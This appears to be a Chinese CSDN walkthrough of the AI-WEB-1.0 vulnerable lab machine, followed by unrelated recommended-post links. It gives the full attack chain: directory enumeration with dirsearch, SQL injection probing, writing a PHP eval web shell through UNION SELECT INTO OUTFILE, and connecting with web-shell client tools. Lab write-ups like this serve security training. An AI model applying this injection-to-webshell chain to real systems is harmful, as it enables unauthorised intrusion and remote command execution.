CSDN AI-WEB-1.0 攻略

找到一个目标靶场的IP , 这里以172.16.1.98 为例

1、使用命令 /robots.txt 来确定目录

2、分别测试两个文件

均无法访问,可返回其根目录查询

3、到根目录,出现搜索框

4、输入ID为1

5、使用虚拟机kali的终端

搜索命令 dirsearch -u http://172.16.1.98/m3diNf0/

6、搜索文件 info.php

即可得到 WWW 所在的根目录

7、确定闭合方式 1'

8、确定字段

1' order by 3#

9、注入一句话"木马"

1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #

9、查看文件,木马是否注入成功

搜索 /s /up /sis.php

10、使用中国蚁键/中国菜刀等工具,进入该系统

++即可成功获取信息++

安全

网络安全人人有责,切勿知法犯法

相关推荐
王小小鸭2 分钟前
【Oracle APEX开发小技巧17】交互式网格操作按钮根据条件/状态设置能否被点击生效
数据库·oracle·oracle apex
lang201509286 分钟前
oracle 11查询数据库锁
数据库·oracle
hweiyu009 分钟前
Oracle 基础入门:核心概念与实操指南(视频教程)
数据库·oracle
道一2322 分钟前
在Electron应用中控制剪贴板操-复制&粘贴
前端·javascript·electron
xulihang25 分钟前
如何在Windows上使用SANE扫描文档
linux·前端·javascript
wanhengidc32 分钟前
云手机的网络架构
服务器·网络·游戏·智能手机·架构·云计算
羊锦磊38 分钟前
[ 项目开发 1.0 ] 新闻网站的开发流程和注意事项
java·数据库·spring boot·redis·spring·oracle·json
hjhcos41 分钟前
【SQL server】不同平台相同数据库之间某个平台经常性死锁
数据库
q***766644 分钟前
网络安全防护指南:筑牢网络安全防线(510)
安全·web安全·php
挠到秃头的涛某1 小时前
华为防火墙web配置SSL-在外人员访问内网资源
运维·网络·网络协议·tcp/ip·华为·ssl·防火墙